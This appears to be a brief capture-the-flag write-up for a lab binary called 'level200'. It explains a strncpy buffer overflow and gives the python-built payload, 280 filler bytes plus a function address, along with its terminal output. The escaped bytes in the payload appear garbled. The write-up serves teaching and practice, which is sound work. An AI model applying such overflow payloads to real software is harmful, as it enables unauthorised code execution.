This binary is vulnerable to a buffer overflow in the strncpy function called in the main function with user supplied input. It takes in two arguments, argument 1 being the offset of the address on the stack of the value to copy data from, and argument 2 being the number of bytes to copy. The size of the buffer being copied to is a maximum of 280 bytes. Since the binary has a function containing a call to system(“cat key.txt”), we may simply replace the saved frame pointer with the function address.
Our address is 0x0000000000400654. We may craft the exploit now, knowing the offset of the saved frame pointer (%RSP+280), and the address of our cat_key. We simply need to copy more than 288 bytes (we choose 300 arbitrarily) from the 3rd argument offset in the stack, i.e. our third argument we pass.
[email protected]:~/cscamp/exp200$ ./level200 3 300 `python -c 'print "A"*280 + "x54x06x40x00x00x00x00x00"'` You entred : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[email protected] cat: ./key.txt: No such file or directory Segmentation fault [email protected]:~/cscamp/exp200$